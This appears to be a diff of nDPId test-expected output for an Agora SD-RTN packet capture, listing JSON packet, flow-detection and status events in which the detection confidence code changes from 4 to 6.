00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1649098129676,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098129676,"pkt":"eJS0JASgYDjgxTWgCABFoAEG8ltAAD8RjrLAqAJkwXY0ttgaH8IA8j0KAHm3rAAAIQAAAAAABFNOSQAcADE5My0xMTgtNTItMTgyLmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKYe5uMMeslRB3XNb4oIMtxM1Kq4uVO9ATPzLnBeCEFFQUQEAEFFU0dQVUJTQQAEfMIBHrlyhJSJQxs1oKYK9vHZz2ftsZjVFavleGiXwVxs5oZBr4mTdCDKj32Pfmb663V\/iNj2FyPr9qh0qRkaWEtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098129676,"flow_last_seen":1649098129676,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098129676,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.118.52.182","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098129676,"flow_last_seen":1649098129676,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098129676,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.118.52.182","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1649098129676,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098129676,"pkt":"eJS0JASgYDjgxTWgCABFoAEG8lxAAD8RjrHAqAJkwXY0ttgaH8IA8j0KAHm3rAAAIQAAAAAABFNOSQAcADE5My0xMTgtNTItMTgyLmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKYe5uMMeslRB3XNb4oIMtxM1Kq4uVO9ATPzLnBeCEFFQUQEAEFFU0dQVUJTQQAEfMIBHrlyhJSJQxs1oKYK9vHZz2ftsZjVFavleGiXwVxs5oZBr4mTdCDKj32Pfmb663V\/iNj2FyPr9qh0qRkaWEtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1649098129677,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098129677,"pkt":"eJS0JASgYDjgxTWgCABFoAEG8l1AAD8RjrDAqAJkwXY0ttgaH8IA8j0KAHm3rAAAIQAAAAAABFNOSQAcADE5My0xMTgtNTItMTgyLmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKYe5uMMeslRB3XNb4oIMtxM1Kq4uVO9ATPzLnBeCEFFQUQEAEFFU0dQVUJTQQAEfMIBHrlyhJSJQxs1oKYK9vHZz2ftsZjVFavleGiXwVxs5oZBr4mTdCDKj32Pfmb663V\/iNj2FyPr9qh0qRkaWEtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 
00565{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":211,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","packets-captured":211,"packets-processed":210,"total-skipped-flows":0,"total-l4-payload-len":50011,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":14,"total-detection-updates":0,"total-updates":0,"current-active-flows":6,"total-active-flows":14,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":82,"global_ts_msec":1649098819739} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098069706,"flow_last_seen":1649098069706,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3368,"flow_avg_l4_payload_len":224,"midstream":0,"thread_ts_msec":1649098819802,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":47453,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098094676,"flow_last_seen":1649098094756,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1649098819802,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.233.218","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098070259,"flow_last_seen":1649098070310,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3300,"flow_avg_l4_payload_len":220,"midstream":0,"thread_ts_msec":1649098819802,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":40393,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098069656,"flow_last_seen":1649098069706,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":818,"flow_tot_l4_payload_len":3732,"flow_avg_l4_payload_len":248,"midstream":0,"thread_ts_msec":1649098819802,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":40393,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098129676,"flow_last_seen":1649098129719,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3245,"flow_avg_l4_payload_len":216,"midstream":0,"thread_ts_msec":1649098819802,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.118.52.182","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1649098089567,"flow_last_seen":1649098819802,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":944,"flow_tot_l4_payload_len":7165,"flow_avg_l4_payload_len":238,"midstream":0,"thread_ts_msec":1649098819802,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098069706,"flow_last_seen":1649098069706,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3368,"flow_avg_l4_payload_len":224,"midstream":0,"thread_ts_msec":1649098819802,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":47453,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098094676,"flow_last_seen":1649098094756,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1649098819802,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.233.218","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098070259,"flow_last_seen":1649098070310,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3300,"flow_avg_l4_payload_len":220,"midstream":0,"thread_ts_msec":1649098819802,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":40393,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098069656,"flow_last_seen":1649098069706,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":818,"flow_tot_l4_payload_len":3732,"flow_avg_l4_payload_len":248,"midstream":0,"thread_ts_msec":1649098819802,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":40393,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098129676,"flow_last_seen":1649098129719,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3245,"flow_avg_l4_payload_len":216,"midstream":0,"thread_ts_msec":1649098819802,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.118.52.182","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1649098089567,"flow_last_seen":1649098819802,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":944,"flow_tot_l4_payload_len":7165,"flow_avg_l4_payload_len":238,"midstream":0,"thread_ts_msec":1649098819802,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098849713,"flow_last_seen":1649098849713,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649098849713,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1649098849713,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649098849713,"pkt":"eJS0JASgYDjgxTWgCABFoAEFjY5AAD8Rp8zAqAJkgAHB39gaH8IA8ZWbALrcNQAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjMuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAAAqO653g\/hCRLYJiWr5HwhPLNmBmFf1jZ6sWoE3wYWQUVBRAQAQUVTR1BVQlNBAAShXWD9bdPdTqNRd9XnrAbDYLUfMQlth+FXkrmXNCnpwnaRd1+zUbpvZZqEZL8R\/FHgoWlN8+rWWaa4DpcfkLsbS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098849713,"flow_last_seen":1649098849713,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649098849713,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098849713,"flow_last_seen":1649098849713,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649098849713,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1649098849713,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649098849713,"pkt":"eJS0JASgYDjgxTWgCABFoAEFjY9AAD8Rp8vAqAJkgAHB39gaH8IA8ZWbALrcNQAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjMuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAAAqO653g\/hCRLYJiWr5HwhPLNmBmFf1jZ6sWoE3wYWQUVBRAQAQUVTR1BVQlNBAAShXWD9bdPdTqNRd9XnrAbDYLUfMQlth+FXkrmXNCnpwnaRd1+zUbpvZZqEZL8R\/FHgoWlN8+rWWaa4DpcfkLsbS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1649098849714,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649098849714,"pkt":"eJS0JASgYDjgxTWgCABFoAEFjZBAAD8Rp8rAqAJkgAHB39gaH8IA8ZWbALrcNQAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjMuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAAAqO653g\/hCRLYJiWr5HwhPLNmBmFf1jZ6sWoE3wYWQUVBRAQAQUVTR1BVQlNBAAShXWD9bdPdTqNRd9XnrAbDYLUfMQlth+FXkrmXNCnpwnaRd1+zUbpvZZqEZL8R\/FHgoWlN8+rWWaa4DpcfkLsbS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":241,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098879720,"flow_last_seen":1649098879720,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098879720,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1649098879720,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098879720,"pkt":"eJS0JASgYDjgxTWgCABFoAEGd\/pAAD8RLJTAqAJkF\/i6tNgaH8IA8lmLAAvF0QAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTgwLmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKkMl1gIyv+w78yvVi1\/kuox+eyErqTnp6Gof+weXkFFQUQEAEFFU0dQVUJTQQAEARJ6wuFU0FclpuLErlZIBuYOHSiMTxKbnkNZkTr3XWhuScUrr\/UN5B3XPbFSiNGAO2v5lJKJeGbxaqRfZNKmhUtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098879720,"flow_last_seen":1649098879720,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098879720,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098879720,"flow_last_seen":1649098879720,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098879720,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1649098879721,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098879721,"pkt":"eJS0JASgYDjgxTWgCABFoAEGd\/tAAD8RLJPAqAJkF\/i6tNgaH8IA8lmLAAvF0QAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTgwLmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKkMl1gIyv+w78yvVi1\/kuox+eyErqTnp6Gof+weXkFFQUQEAEFFU0dQVUJTQQAEARJ6wuFU0FclpuLErlZIBuYOHSiMTxKbnkNZkTr3XWhuScUrr\/UN5B3XPbFSiNGAO2v5lJKJeGbxaqRfZNKmhUtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 
00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1649098879721,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098879721,"pkt":"eJS0JASgYDjgxTWgCABFoAEGd\/xAAD8RLJLAqAJkF\/i6tNgaH8IA8lmLAAvF0QAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTgwLmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKkMl1gIyv+w78yvVi1\/kuox+eyErqTnp6Gof+weXkFFQUQEAEFFU0dQVUJTQQAEARJ6wuFU0FclpuLErlZIBuYOHSiMTxKbnkNZkTr3XWhuScUrr\/UN5B3XPbFSiNGAO2v5lJKJeGbxaqRfZNKmhUtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098909723,"flow_last_seen":1649098909723,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649098909723,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.224","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1649098909723,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649098909723,"pkt":"eJS0JASgYDjgxTWgCABFoAEFGSNAAD8RHDfAqAJkgAHB4NgaH8IA8W8oABnDswAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjQuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAAAqSoMe28oLnTDTmFeZOxmr5z18RrVGKy0+BCCWv+4QUVBRAQAQUVTR1BVQlNBAARSVYAJA6zdDWRpxM9St9qL6qOzgsZyDxIhgwJn+9A1PzyRNecioV1qTytu3xhK7heOGRXDffzXhEsFb1T6Y89aS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098909723,"flow_last_seen":1649098909723,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649098909723,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.224","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098909723,"flow_last_seen":1649098909723,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649098909723,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.224","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1649098909723,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649098909723,"pkt":"eJS0JASgYDjgxTWgCABFoAEFGSRAAD8RHDbAqAJkgAHB4NgaH8IA8W8oABnDswAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjQuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAAAqSoMe28oLnTDTmFeZOxmr5z18RrVGKy0+BCCWv+4QUVBRAQAQUVTR1BVQlNBAARSVYAJA6zdDWRpxM9St9qL6qOzgsZyDxIhgwJn+9A1PzyRNecioV1qTytu3xhK7heOGRXDffzXhEsFb1T6Y89aS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} 